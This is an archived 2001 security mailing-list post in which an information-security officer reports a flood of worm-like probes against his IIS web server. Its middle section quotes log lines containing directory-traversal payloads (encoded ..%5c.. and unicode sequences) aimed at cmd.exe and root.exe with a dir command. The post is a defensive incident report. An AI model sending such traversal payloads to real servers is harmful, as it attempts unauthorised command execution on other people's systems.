command execution attempts

From: Keith.Morgan (Keith.Morganat_private)
Date: Tue Sep 18 2001 - 06:59:23 PDT

Next message: Jason Giglio: "Re: CodeBlue finally hitting, or what?"

Previous message: coopat_private: "Re: New worm? 'readme.eml'"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Wow.  This morning we've been hit with a deluge of attempts at
....../cmd.exe?<args here> and attempts to access ...../root.exe?<args here>

My IDS is going haywire.  They're coming from diverse IP's, mostly in the
216.* class A.  This doesn't appear to be a standard code-red type thing.
Have a look at log exerpts...

This all appeared to kick off at roughly 9AM EST.  Have I missed some
prolific worm out there?  

2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/root.exe /c+dir 401 -
2001-09-18 13:38:01 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET /MSADC/root.exe
/c+dir 401 -
2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/c/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:05 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/d/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:07 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
/c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:08 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:09 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:10 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:38:11 216.230.91.177 - xxx.xxx.xxx.xxx 80 GET
/scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -


All of the offending IP's are following this exact pattern, indicating a
worm.  

Keith T. Morgan
Chief of Information Security
Terradon Communications
keith.morganat_private
304-755-8291 x142


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Jason Giglio: "Re: CodeBlue finally hitting, or what?"
Previous message: coopat_private: "Re: New worm? 'readme.eml'"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 09:41:12 PDT